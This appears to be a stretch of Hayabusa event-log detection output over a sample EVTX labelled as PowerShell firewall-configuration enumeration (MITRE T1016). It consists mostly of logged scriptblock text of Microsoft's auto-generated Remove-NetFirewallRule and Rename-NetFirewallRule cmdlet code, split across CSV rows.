$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 